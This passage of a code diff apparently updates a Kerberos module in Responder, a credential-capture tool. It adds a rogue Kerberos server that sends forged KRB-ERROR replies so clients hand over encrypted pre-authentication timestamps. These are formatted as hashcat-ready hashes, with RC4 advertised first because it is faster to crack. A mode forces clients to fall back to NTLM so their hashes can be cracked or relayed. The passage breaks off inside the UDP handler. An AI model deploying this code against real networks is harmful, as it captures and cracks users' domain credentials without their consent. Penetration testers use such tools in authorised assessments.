-		if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
-			HashLen = struct.unpack('<b',Data[50:51])[0]
-			if HashLen == 54:
-				Hash       = Data[53:105]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[153:154])[0]
-				Name       = Data[154:154+NameLen]
-				DomainLen  = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
-				Domain     = Data[154+NameLen+4:154+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
+# Kerberos encryption types
+ENCRYPTION_TYPES = {
+	b'\x01': 'des-cbc-crc',
+	b'\x03': 'des-cbc-md5',
+	b'\x11': 'aes128-cts-hmac-sha1-96',
+	b'\x12': 'aes256-cts-hmac-sha1-96',
+	b'\x13': 'rc4-hmac',
+	b'\x14': 'rc4-hmac-exp',
+	b'\x17': 'rc4-hmac',
+	b'\x18': 'rc4-hmac-exp',
+}
 
-		if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
-			HashLen = struct.unpack('<b',Data[45:46])[0]
-			if HashLen == 53:
-				Hash       = Data[48:99]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[147:148])[0]
-				Name       = Data[148:148+NameLen]
-				DomainLen  = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
-				Domain     = Data[148+NameLen+4:148+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-			elif HashLen == 54:
-				Hash       = Data[53:105]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[148:149])[0]
-				Name       = Data[149:149+NameLen]
-				DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-				Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-		else:
-			Hash       = Data[48:100]
-			SwitchHash = Hash[16:]+Hash[0:16]
-			NameLen    = struct.unpack('<b',Data[148:149])[0]
-			Name       = Data[149:149+NameLen]
-			DomainLen  = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
-			Domain     = Data[149+NameLen+4:149+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-			return BuildHash
-	return False
+def parse_asn1_length(data, offset):
+	"""Parse ASN.1 length field (short or long form)"""
+	if offset >= len(data):
+		return 0, 0
+	
+	first_byte = data[offset]
+	
+	# Short form (length < 128)
+	if first_byte < 0x80:
+		return first_byte, 1
+	
+	# Long form
+	num_octets = first_byte & 0x7F
+	if num_octets == 0 or offset + 1 + num_octets > len(data):
+		return 0, 0
+	
+	length = 0
+	for i in range(num_octets):
+		length = (length << 8) | data[offset + 1 + i]
+	
+	return length, 1 + num_octets
 
-def ParseMSKerbv5UDP(Data):
-	MsgType = Data[17:18]
-	EncType = Data[39:40]
+def encode_asn1_length(length):
+	"""Encode length in ASN.1 format"""
+	if length < 128:
+		return struct.pack('B', length)
+	
+	# Long form
+	length_bytes = []
+	temp = length
+	while temp > 0:
+		length_bytes.insert(0, temp & 0xFF)
+		temp >>= 8
+	
+	num_octets = len(length_bytes)
+	result = struct.pack('B', 0x80 | num_octets)
+	for byte in length_bytes:
+		result += struct.pack('B', byte)
+	
+	return result
 
-	if MsgType == "\x0a" and EncType == "\x17":
-		if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
-			HashLen = struct.unpack('<b',Data[41:42])[0]
-			if HashLen == 54:
-				Hash       = Data[44:96]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[144:145])[0]
-				Name       = Data[145:145+NameLen]
-				DomainLen  = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
-				Domain     = Data[145+NameLen+4:145+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-			elif HashLen == 53:
-				Hash       = Data[44:95]
-				SwitchHash = Hash[16:]+Hash[0:16]
-				NameLen    = struct.unpack('<b',Data[143:144])[0]
-				Name       = Data[144:144+NameLen]
-				DomainLen  = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
-				Domain     = Data[144+NameLen+4:144+NameLen+4+DomainLen]
-				BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-				return BuildHash
-		else:
-			Hash       = Data[49:101]
-			SwitchHash = Hash[16:]+Hash[0:16]
-			NameLen    = struct.unpack('<b',Data[149:150])[0]
-			Name       = Data[150:150+NameLen]
-			DomainLen  = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
-			Domain     = Data[150+NameLen+4:150+NameLen+4+DomainLen]
-			BuildHash  = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
-			return BuildHash
-	return False
+def extract_principal_name(data):
+	"""Extract principal name from AS-REQ - searches in req-body only"""
+	try:
+		# Look for [4] req-body tag first to avoid PA-DATA
+		req_body_offset = None
+		for i in range(len(data) - 100):
+			if data[i:i+1] == b'\xa4':  # [4] req-body
+				req_body_offset = i
+				break
+		
+		if req_body_offset is None:
+			return "user"
+		
+		# Search for [1] cname AFTER req-body starts
+		search_start = req_body_offset
+		search_end = min(search_start + 150, len(data) - 20)
+		
+		for i in range(search_start, search_end):
+			# Look for GeneralString (0x1b) with reasonable length
+			if data[i:i+1] == b'\x1b':
+				name_len = data[i+1] if i+1 < len(data) else 0
+				if 1 < name_len < 30 and i + 2 + name_len <= len(data):
+					name = data[i+2:i+2+name_len].decode('latin-1', errors='ignore')
+					# Validate: printable, no control chars, looks like username
+					if (name and 
+						name.isprintable() and 
+						name.isascii() and
+						not any(c in name for c in ['\x00', '\n', '\r', '\t']) and
+						all(c.isalnum() or c in '.-_@' for c in name)):
+						return name
+		
+		return "user"
+	except:
+		return "user"
+
+def extract_realm(data):
+	"""Extract realm from AS-REQ - searches in req-body only"""
+	try:
+		# Look for [4] req-body tag first
+		req_body_offset = None
+		for i in range(len(data) - 100):
+			if data[i:i+1] == b'\xa4':  # [4] req-body
+				req_body_offset = i
+				break
+		
+		if req_body_offset is None:
+			return settings.Config.MachineName.upper()
+		
+		# Search for realm AFTER req-body starts
+		search_start = req_body_offset + 10
+		search_end = min(search_start + 150, len(data) - 20)
+		
+		for i in range(search_start, search_end):
+			# Look for GeneralString (0x1b) with reasonable length
+			if data[i:i+1] == b'\x1b':
+				realm_len = data[i+1] if i+1 < len(data) else 0
+				# Realm should be 5-50 chars (like "DOMAIN.LOCAL")
+				if 5 < realm_len < 50 and i + 2 + realm_len <= len(data):
+					realm = data[i+2:i+2+realm_len].decode('latin-1', errors='ignore')
+					# Validate: printable ASCII, contains dot, looks like domain
+					if (realm and 
+						realm.isprintable() and 
+						realm.isascii() and
+						'.' in realm and 
+						realm.count('.') >= 1 and realm.count('.') <= 5 and
+						not any(c in realm for c in ['\x00', '\n', '\r', '\t', '/', ':', ' ']) and
+						all(c.isalnum() or c in '.-' for c in realm)):
+						return realm
+		
+		return settings.Config.MachineName.upper()
+	except:
+		return settings.Config.MachineName.upper()
+
+def find_msg_type(data):
+	"""Find Kerberos message type by parsing ASN.1 structure"""
+	try:
+		offset = 0
+		
+		# Check APPLICATION tag
+		# [10] for AS-REQ (0x6a)
+		# [12] for TGS-REQ (0x6c)
+		if offset >= len(data):
+			return None, False, None, None
+		
+		app_tag = data[offset]
+		if app_tag not in [0x6a, 0x6c]:  # AS-REQ or TGS-REQ
+			return None, False, None, None
+		
+		offset += 1
+		
+		# Parse outer length
+		length, consumed = parse_asn1_length(data, offset)
+		if consumed == 0:
+			return None, False, None, None
+		offset += consumed
+		
+		# SEQUENCE tag
+		if offset >= len(data) or data[offset] != 0x30:
+			return None, False, None, None
+		offset += 1
+		
+		# Parse SEQUENCE length
+		seq_length, consumed = parse_asn1_length(data, offset)
+		if consumed == 0:
+			return None, False, None, None
+		offset += consumed
+		
+		# [1] pvno
+		if offset >= len(data) or data[offset] != 0xa1:
+			return None, False, None, None
+		offset += 1
+		
+		pvno_len, consumed = parse_asn1_length(data, offset)
+		offset += consumed + pvno_len
+		
+		# [2] msg-type
+		if offset >= len(data) or data[offset] != 0xa2:
+			return None, False, None, None
+		offset += 1
+		
+		msgtype_len, consumed = parse_asn1_length(data, offset)
+		offset += consumed
+		
+		# INTEGER tag
+		if offset >= len(data) or data[offset] != 0x02:
+			return None, False, None, None
+		offset += 1
+		
+		int_len, consumed = parse_asn1_length(data, offset)
+		offset += consumed
+		
+		if offset >= len(data):
+			return None, False, None, None
+		
+		msg_type = data[offset]
+		
+		# Extract client name and realm for KRB-ERROR response
+		cname = extract_principal_name(data)
+		realm = extract_realm(data)
+		
+		return msg_type, True, cname, realm
+	
+	except:
+		return None, False, None, None
+
+def extract_encrypted_timestamp(data):
+	"""
+	Extract encrypted timestamp from PA-ENC-TIMESTAMP in AS-REQ
+	Returns: (etype, cipher_hex) or (None, None)
+	"""
+	try:
+		# Look for PA-ENC-TIMESTAMP pattern: a1 03 02 01 02 (padata-type = 2)
+		for i in range(len(data) - 60):
+			# Look for the specific pattern that indicates PA-ENC-TIMESTAMP
+			if (i + 5 < len(data) and 
+				data[i] == 0xa1 and data[i+1] == 0x03 and 
+				data[i+2] == 0x02 and data[i+3] == 0x01 and 
+				data[i+4] == 0x02):  # padata-type = 2
+				
+				# Now find [2] padata-value which should be right after
+				j = i + 5
+				if j < len(data) and data[j] == 0xa2:  # [2] padata-value
+					j += 1
+					# Parse length of padata-value
+					pv_len, consumed = parse_asn1_length(data, j)
+					j += consumed
+					
+					# Inside padata-value is OCTET STRING containing EncryptedData
+					if j < len(data) and data[j] == 0x04:  # OCTET STRING
+						j += 1
+						octet_len, consumed = parse_asn1_length(data, j)
+						j += consumed
+						
+						# Now we're inside EncryptedData SEQUENCE
+						if j < len(data) and data[j] == 0x30:  # SEQUENCE
+							j += 1
+							seq_len, consumed = parse_asn1_length(data, j)
+							j += consumed
+							
+							# Look for [0] etype
+							if j < len(data) and data[j] == 0xa0:  # [0] etype
+								j += 1
+								etype_len, consumed = parse_asn1_length(data, j)
+								j += consumed
+								
+								# INTEGER tag
+								if j < len(data) and data[j] == 0x02:
+									j += 1
+									int_len, consumed = parse_asn1_length(data, j)
+									j += consumed
+									etype = data[j] if j < len(data) else None
+									j += int_len
+									
+									# Now look for [2] cipher (OCTET STRING)
+									if j < len(data) and data[j] == 0xa2:  # [2] cipher
+										j += 1
+										cipher_tag_len, consumed = parse_asn1_length(data, j)
+										j += consumed
+										
+										# OCTET STRING
+										if j < len(data) and data[j] == 0x04:
+											j += 1
+											cipher_len, consumed = parse_asn1_length(data, j)
+											j += consumed
+											
+											if j + cipher_len <= len(data):
+												cipher = data[j:j+cipher_len]
+												cipher_hex = cipher.hex()
+												return etype, cipher_hex
+		
+		return None, None
+	except Exception as e:
+		if settings.Config.Verbose:
+			print(text('[KERB] Error extracting timestamp: %s' % str(e)))
+		return None, None
+
+def find_padata_and_etype(data):
+	"""
+	Search for PA-DATA and determine encryption type
+	Returns: (has_padata, etype) where etype is the encryption type number or None
+	"""
+	try:
+		# Look for [3] PA-DATA tag (0xa3)
+		for i in range(len(data) - 60):
+			if data[i:i+1] == b'\xa3':
+				# Found PA-DATA, now we need to check if it contains PA-ENC-TIMESTAMP
+				# Structure: [3] SEQUENCE OF { [1] padata-type, [2] padata-value }
+				
+				# Look for [1] padata-type within next 30 bytes
+				has_pa_enc_timestamp = False
+				padata_value_offset = None
+				
+				for j in range(i, min(i + 30, len(data) - 10)):
+					if data[j:j+1] == b'\xa1':  # [1] padata-type
+						# Check if padata-type = 2 (PA-ENC-TIMESTAMP)
+						# Pattern: a1 03 02 01 02
+						if j + 4 < len(data) and data[j+1:j+5] == b'\x03\x02\x01\x02':
+							has_pa_enc_timestamp = True
+							# Next should be [2] padata-value
+							break
+				
+				if not has_pa_enc_timestamp:
+					# PA-DATA exists but not PA-ENC-TIMESTAMP
+					# This is normal for first AS-REQ
+					return False, None
+				
+				# Now look for [2] padata-value which contains EncryptedData
+				for j in range(i, min(i + 50, len(data) - 10)):
+					if data[j:j+1] == b'\xa2':  # [2] padata-value
+						# Inside padata-value is EncryptedData
+						# Now look for [0] etype inside EncryptedData
+						for k in range(j, min(j + 30, len(data) - 5)):
+							if data[k:k+1] == b'\xa0':  # [0] etype
+								# Pattern: a0 03 02 01 <etype>
+								if k + 4 < len(data) and data[k+1:k+3] == b'\x03\x02':
+									etype = data[k+4]
+									if settings.Config.Verbose:
+										etype_name = ENCRYPTION_TYPES.get(bytes([etype]), 'unknown')
+										print(text('[KERB] Found PA-ENC-TIMESTAMP with etype %d (%s)' % (etype, etype_name)))
+									return True, etype
+				
+				# Found PA-DATA but couldn't determine etype
+				return True, None
+		
+		return False, None
+	
+	except:
+		return False, None
+
+def build_krb_error(realm, cname, sname=None):
+	"""
+	Build KRB-ERROR response with PA-DATA for pre-authentication
+	
+	KRB-ERROR ::= [APPLICATION 30] SEQUENCE {
+		pvno[0] INTEGER (5),
+		msg-type[1] INTEGER (30),
+		ctime[2] KerberosTime OPTIONAL,
+		cusec[3] INTEGER OPTIONAL,
+		stime[4] KerberosTime,
+		susec[5] INTEGER,
+		error-code[6] INTEGER,
+		crealm[7] Realm OPTIONAL,
+		cname[8] PrincipalName OPTIONAL,
+		realm[9] Realm,
+		sname[10] PrincipalName,
+		e-text[11] GeneralString OPTIONAL,
+		e-data[12] OCTET STRING OPTIONAL
+	}
+	"""
+	
+	# Get current time
+	current_time = time.time()
+	time_str = time.strftime('%Y%m%d%H%M%SZ', time.gmtime(current_time))
+	susec = int((current_time - int(current_time)) * 1000000)
+	
+	# Build sname (server name) - krbtgt/REALM@REALM
+	if sname is None:
+		sname = 'krbtgt'
+	
+	# Build the inner SEQUENCE
+	inner = b''
+	
+	# [0] pvno: 5
+	inner += b'\xa0\x03\x02\x01\x05'
+	
+	# [1] msg-type: 30 (KRB-ERROR)
+	inner += b'\xa1\x03\x02\x01\x1e'
+	
+	# [4] stime (server time)
+	# KerberosTime is GeneralizedTime (tag 0x18)
+	time_bytes = time_str.encode('ascii')
+	inner += b'\xa4' + encode_asn1_length(len(time_bytes) + 2) + b'\x18' + encode_asn1_length(len(time_bytes)) + time_bytes
+	
+	# [5] susec (microseconds)
+	susec_bytes = struct.pack('>I', susec)
+	# Remove leading zeros
+	while len(susec_bytes) > 1 and susec_bytes[0] == 0:
+		susec_bytes = susec_bytes[1:]
+	inner += b'\xa5' + encode_asn1_length(len(susec_bytes) + 2) + b'\x02' + encode_asn1_length(len(susec_bytes)) + susec_bytes
+	
+	# [6] error-code: 25 (KDC_ERR_PREAUTH_REQUIRED)
+	inner += b'\xa6\x03\x02\x01\x19'
+	
+	# [9] realm (server realm)
+	realm_bytes = realm.encode('ascii')
+	inner += b'\xa9' + encode_asn1_length(len(realm_bytes) + 2) + b'\x1b' + encode_asn1_length(len(realm_bytes)) + realm_bytes
+	
+	# [10] sname (server principal name)
+	# PrincipalName ::= SEQUENCE { name-type[0] Int32, name-string[1] SEQUENCE OF GeneralString }
+	sname_str = sname.encode('ascii')
+	realm_str = realm.encode('ascii')
+	
+	# Build name-string SEQUENCE
+	name_string_seq = b''
+	# First component: service name (krbtgt)
+	name_string_seq += b'\x1b' + encode_asn1_length(len(sname_str)) + sname_str
+	# Second component: realm
+	name_string_seq += b'\x1b' + encode_asn1_length(len(realm_str)) + realm_str
+	
+	# Wrap in SEQUENCE
+	name_string_wrapped = b'\x30' + encode_asn1_length(len(name_string_seq)) + name_string_seq
+	
+	# Build name-string [1]
+	name_string_tagged = b'\xa1' + encode_asn1_length(len(name_string_wrapped)) + name_string_wrapped
+	
+	# Build name-type [0] - type 2 (KRB_NT_SRV_INST)
+	name_type = b'\xa0\x03\x02\x01\x02'
+	
+	# Build PrincipalName SEQUENCE
+	principal_seq = name_type + name_string_tagged
+	principal_wrapped = b'\x30' + encode_asn1_length(len(principal_seq)) + principal_seq
+	
+	# Tag [10]
+	inner += b'\xaa' + encode_asn1_length(len(principal_wrapped)) + principal_wrapped
+	
+	# [12] e-data (PA-DATA)
+	edata = build_pa_data(realm, cname)
+	inner += b'\xac' + encode_asn1_length(len(edata) + 2) + b'\x04' + encode_asn1_length(len(edata)) + edata
+	
+	# Wrap in SEQUENCE
+	sequence = b'\x30' + encode_asn1_length(len(inner)) + inner
+	
+	# Wrap in APPLICATION 30 tag
+	krb_error = b'\x7e' + encode_asn1_length(len(sequence)) + sequence
+	
+	return krb_error
+
+def build_krb_error_force_ntlm(realm, cname, sname=None):
+	"""
+	Build KRB-ERROR with KDC_ERR_ETYPE_NOSUPP (14)
+	This forces the client to fall back to NTLM authentication
+	
+	Useful when you want NetNTLMv2 hashes instead of Kerberos AS-REP:
+	- NetNTLMv2 is often faster to crack
+	- Can be relayed to other services
+	"""
+	
+	# Get current time
+	current_time = time.time()
+	time_str = time.strftime('%Y%m%d%H%M%SZ', time.gmtime(current_time))
+	susec = int((current_time - int(current_time)) * 1000000)
+	
+	# Build sname (server name)
+	if sname is None:
+		sname = 'krbtgt'
+	
+	# Build the inner SEQUENCE
+	inner = b''
+	
+	# [0] pvno: 5
+	inner += b'\xa0\x03\x02\x01\x05'
+	
+	# [1] msg-type: 30 (KRB-ERROR)
+	inner += b'\xa1\x03\x02\x01\x1e'
+	
+	# [4] stime (server time)
+	time_bytes = time_str.encode('ascii')
+	inner += b'\xa4' + encode_asn1_length(len(time_bytes) + 2) + b'\x18' + encode_asn1_length(len(time_bytes)) + time_bytes
+	
+	# [5] susec (microseconds)
+	susec_bytes = struct.pack('>I', susec)
+	while len(susec_bytes) > 1 and susec_bytes[0] == 0:
+		susec_bytes = susec_bytes[1:]
+	inner += b'\xa5' + encode_asn1_length(len(susec_bytes) + 2) + b'\x02' + encode_asn1_length(len(susec_bytes)) + susec_bytes
+	
+	# [6] error-code: 14 (KDC_ERR_ETYPE_NOSUPP) - forces NTLM fallback
+	inner += b'\xa6\x03\x02\x01\x0e'
+	
+	# [9] realm (server realm)
+	realm_bytes = realm.encode('ascii')
+	inner += b'\xa9' + encode_asn1_length(len(realm_bytes) + 2) + b'\x1b' + encode_asn1_length(len(realm_bytes)) + realm_bytes
+	
+	# [10] sname (server principal name)
+	sname_str = sname.encode('ascii')
+	realm_str = realm.encode('ascii')
+	
+	# Build name-string SEQUENCE
+	name_string_seq = b''
+	name_string_seq += b'\x1b' + encode_asn1_length(len(sname_str)) + sname_str
+	name_string_seq += b'\x1b' + encode_asn1_length(len(realm_str)) + realm_str
+	
+	# Wrap in SEQUENCE
+	name_string_wrapped = b'\x30' + encode_asn1_length(len(name_string_seq)) + name_string_seq
+	name_string_tagged = b'\xa1' + encode_asn1_length(len(name_string_wrapped)) + name_string_wrapped
+	name_type = b'\xa0\x03\x02\x01\x02'
+	
+	# Build PrincipalName SEQUENCE
+	principal_seq = name_type + name_string_tagged
+	principal_wrapped = b'\x30' + encode_asn1_length(len(principal_seq)) + principal_seq
+	
+	# Tag [10]
+	inner += b'\xaa' + encode_asn1_length(len(principal_wrapped)) + principal_wrapped
+	
+	# [11] e-text (error description)
+	etext_str = "KDC has no support for encryption type"
+	etext_bytes = etext_str.encode('ascii')
+	inner += b'\xab' + encode_asn1_length(len(etext_bytes) + 2) + b'\x1b' + encode_asn1_length(len(etext_bytes)) + etext_bytes
+	
+	# Wrap in SEQUENCE
+	sequence = b'\x30' + encode_asn1_length(len(inner)) + inner
+	
+	# Wrap in APPLICATION 30 tag
+	krb_error = b'\x7e' + encode_asn1_length(len(sequence)) + sequence
+	
+	return krb_error
+
+def build_pa_data(realm, cname):
+	"""
+	Build PA-DATA sequence for pre-authentication
+	
+	PA-DATA ::= SEQUENCE {
+		padata-type[1] Int32,
+		padata-value[2] OCTET STRING
+	}
+	
+	Returns SEQUENCE OF PA-DATA with:
+	- PA-ETYPE-INFO2 (19) - with RC4 first, then AES256
+	- PA-ENC-TIMESTAMP (2) - empty
+	- PA-PK-AS-REQ (16) - empty
+	- PA-PK-AS-REP-19 (15) - empty
+	"""
+	
+	pa_data_list = b''
+	
+	# 1. PA-ETYPE-INFO2 (type 19)
+	pa_etype_info2 = build_pa_etype_info2(realm, cname)
+	pa_data_list += build_single_pa_data(19, pa_etype_info2)
+	
+	# 2. PA-ENC-TIMESTAMP (type 2) - empty padata-value
+	pa_data_list += build_single_pa_data(2, b'')
+	
+	# 3. PA-PK-AS-REQ (type 16) - empty padata-value
+	pa_data_list += build_single_pa_data(16, b'')
+	
+	# 4. PA-PK-AS-REP-19 (type 15) - empty padata-value
+	pa_data_list += build_single_pa_data(15, b'')
+	
+	# Wrap in SEQUENCE
+	return b'\x30' + encode_asn1_length(len(pa_data_list)) + pa_data_list
+
+def build_single_pa_data(padata_type, padata_value):
+	"""Build a single PA-DATA entry"""
+	inner = b''
+	
+	# [1] padata-type
+	type_bytes = struct.pack('>I', padata_type)
+	# Remove leading zeros
+	while len(type_bytes) > 1 and type_bytes[0] == 0:
+		type_bytes = type_bytes[1:]
+	inner += b'\xa1\x03\x02\x01' + bytes([padata_type])
+	
+	# [2] padata-value (OCTET STRING)
+	if len(padata_value) > 0:
+		inner += b'\xa2' + encode_asn1_length(len(padata_value) + 2) + b'\x04' + encode_asn1_length(len(padata_value)) + padata_value
+	else:
+		# Empty OCTET STRING
+		inner += b'\xa2\x02\x04\x00'
+	
+	# Wrap in SEQUENCE
+	return b'\x30' + encode_asn1_length(len(inner)) + inner
+
+def build_pa_etype_info2(realm, cname):
+	"""
+	Build PA-ETYPE-INFO2 structure
+	
+	ETYPE-INFO2 ::= SEQUENCE OF ETYPE-INFO2-ENTRY
+	ETYPE-INFO2-ENTRY ::= SEQUENCE {
+		etype[0] Int32,
+		salt[1] GeneralString OPTIONAL,
+		s2kparams[2] OCTET STRING OPTIONAL
+	}
+	
+	Returns entries for RC4 (etype 23) first, then AES256 (etype 18)
+	RC4 is preferred as it's much faster to crack
+	"""
+	
+	# Build salt for AES: REALM + username (e.g., "SMB3.LOCALlgandx")
+	hostname = settings.Config.MachineName.lower()
+	salt_aes = realm + cname.lower()
+	salt_aes_bytes = salt_aes.encode('ascii')
+	
+	entries = b''
+	
+	# Entry 1: RC4-HMAC (etype 23 = 0x17)
+	# RC4 doesn't use salt in ETYPE-INFO2, only etype
+	inner_rc4 = b''
+	inner_rc4 += b'\xa0\x03\x02\x01\x17'  # [0] etype: 23
+	# No salt field for RC4
+	entry_rc4 = b'\x30' + encode_asn1_length(len(inner_rc4)) + inner_rc4
+	entries += entry_rc4
+	
+	# Entry 2: AES256 (etype 18 = 0x12)
+	inner_aes = b''
+	inner_aes += b'\xa0\x03\x02\x01\x12'  # [0] etype: 18
+	inner_aes += b'\xa1' + encode_asn1_length(len(salt_aes_bytes) + 2) + b'\x1b' + encode_asn1_length(len(salt_aes_bytes)) + salt_aes_bytes
+	entry_aes = b'\x30' + encode_asn1_length(len(inner_aes)) + inner_aes
+	entries += entry_aes
+	
+	# Wrap in SEQUENCE (ETYPE-INFO2 - SEQUENCE OF entries)
+	etype_info2 = b'\x30' + encode_asn1_length(len(entries)) + entries
+	
+	return etype_info2
 
 class KerbTCP(BaseRequestHandler):
+	"""Kerberos TCP handler (port 88)"""
+	
 	def handle(self):
-		data = self.request.recv(1024)
-		KerbHash = ParseMSKerbv5TCP(data)
-
-		if KerbHash:
-			n, krb, v, name, domain, d, h = KerbHash.split('$')
-
-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+		try:
+			# TCP Kerberos uses 4-byte length prefix (Record Mark)
+			length_data = self.request.recv(4)
+			if len(length_data) < 4:
+				return
+			
+			# Parse Record Mark (big-endian, high bit reserved)
+			msg_length = struct.unpack('>I', length_data)[0] & 0x7FFFFFFF
+			
+			# Receive the Kerberos message
+			data = b''
+			while len(data) < msg_length:
+				chunk = self.request.recv(msg_length - len(data))
+				if not chunk:
+					return
+				data += chunk
+			
+			# Parse Kerberos message
+			msg_type, valid, cname, realm = find_msg_type(data)
+			
+			if not valid:
+				if settings.Config.Verbose:
+					print(text('[KERB] Invalid Kerberos message'))
+				return
+			
+			if msg_type == 10:  # AS-REQ
+				# Check operation mode
+				kerberos_mode = getattr(settings.Config, 'KerberosMode', 'CAPTURE')
+				
+				# Check if client sent PA-DATA
+				has_padata, etype = find_padata_and_etype(data)
+				
+				if has_padata and etype:
+					# Client sent pre-auth data - extract the encrypted timestamp
+					etype_num, cipher_hex = extract_encrypted_timestamp(data)
+					
+					if etype_num and cipher_hex:
+						etype_name = ENCRYPTION_TYPES.get(bytes([etype_num]), 'unknown')
+						
+						if settings.Config.Verbose:
+							print(text('[KERB] AS-REQ with PA-ENC-TIMESTAMP from %s@%s (etype: %s)' % (cname, realm, etype_name)))
+						
+						# Build the hash in hashcat format
+						if etype_num == 0x17 or etype_num == 0x18:  # RC4 (23 = 0x17, 24 = 0x18)
+							# RC4 format: $krb5pa$23$user$realm$dummy$hash
+							# Flip: last 36 bytes + first 16 bytes (per Responder's ParseMSKerbv5TCP)
+							
+							if len(cipher_hex) >= 32:
+								first_16_bytes = cipher_hex[0:32]   # First 16 bytes
+								rest = cipher_hex[32:]               # Rest (36 bytes)
+								flipped_hash = rest + first_16_bytes
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, flipped_hash)
+							else:
+								hash_value = '$krb5pa$23$%s$%s$dummy$%s' % (cname, realm, cipher_hex)
+								
+						elif etype_num == 0x12:  # AES256 (18) - hashcat mode 19900
+							# Format: $krb5pa$18$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$18$%s$%s$%s' % (cname, realm, cipher_hex)
+						elif etype_num == 0x11:  # AES128 (17) - hashcat mode 19800
+							# Format: $krb5pa$17$user$realm$cipher (hashcat computes salt internally)
+							hash_value = '$krb5pa$17$%s$%s$%s' % (cname, realm, cipher_hex)
+						else:
+							hash_value = '$krb5pa$%d$%s$%s$%s' % (etype_num, cname, realm, cipher_hex)
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'AS-REQ',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'hash': hash_value,
+							'fullhash': hash_value
+						})
+						
+						# Print the hash
+						if settings.Config.Verbose:
+							if etype_num == 0x17 or etype_num == 0x18:
+								print(text('[KERB] Use hashcat -m 7500 (etype 23): %s' % hash_value))
+							elif etype_num == 0x12:
+								print(text('[KERB] Use hashcat -m 19900 (etype 18): %s' % hash_value))
+							elif etype_num == 0x11:
+								print(text('[KERB] Use hashcat -m 19800 (etype 17): %s' % hash_value))
+							else:
+								print(text('[KERB] Kerberos hash (etype %d): %s' % (etype_num, hash_value)))
+					else:
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ with PA-DATA but could not extract hash from %s@%s' % (cname, realm), 1, 1))
+				else:
+					# First AS-REQ without pre-auth
+					if kerberos_mode == 'FORCE_NTLM':
+						# Force NTLM fallback mode
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - forcing NTLM fallback' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR with ETYPE_NOSUPP
+						krb_error = build_krb_error_force_ntlm(realm, cname)
+						
+						# Send with Record Mark
+						response = struct.pack('>I', len(krb_error)) + krb_error
+						self.request.sendall(response)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KDC_ERR_ETYPE_NOSUPP - client should fall back to NTLM', 3, 1))
+						
+						# Log to database
+						SaveToDb({
+							'module': 'Kerberos',
+							'type': 'NTLM-Fallback-Forced',
+							'client': self.client_address[0],
+							'user': cname,
+							'domain': realm,
+							'fullhash': '%s@%s - NTLM fallback forced' % (cname, realm)
+						})
+					else:
+						# Default CAPTURE mode - send pre-auth required
+						if settings.Config.Verbose:
+							print(color('[KERB] AS-REQ from %s@%s - sending PREAUTH_REQUIRED' % (cname, realm), 2, 1))
+						
+						# Build KRB-ERROR response
+						krb_error = build_krb_error(realm, cname)
+						
+						# Send with Record Mark
+						response = struct.pack('>I', len(krb_error)) + krb_error
+						self.request.sendall(response)
+						
+						if settings.Config.Verbose:
+							print(color('[KERB] Sent KRB-ERROR (PREAUTH_REQUIRED) to %s' % self.client_address[0], 2, 1))
+			
+			elif msg_type == 12:  # TGS-REQ
+				if settings.Config.Verbose:
+					print(text('[KERB] TGS-REQ from %s@%s (ignoring)' % (cname, realm)))
+		
+		except Exception as e:
+			if settings.Config.Verbose:
+				print(text('[KERB] Error: %s' % str(e)))
 
 class KerbUDP(BaseRequestHandler):
-
+	"""Kerberos UDP handler (port 88)"""
+	
 	def handle(self):
-		data, soc = self.request
-		KerbHash = ParseMSKerbv5UDP(data)
-
-		if KerbHash:
-			(n, krb, v, name, domain, d, h) = KerbHash.split('$')
-
-			SaveToDb({
-				'module': 'KERB',
-				'type': 'MSKerbv5',
-				'client': self.client_address[0],
-				'user': domain+'\\'+name,
-				'hash': h,
-				'fullhash': KerbHash,
-			})
+		try:
+			data, socket_obj = self.request
+			
+			# Parse Kerberos message
+			msg_type, valid, cname, realm = find_msg_type(data)
+			
+			if not valid:
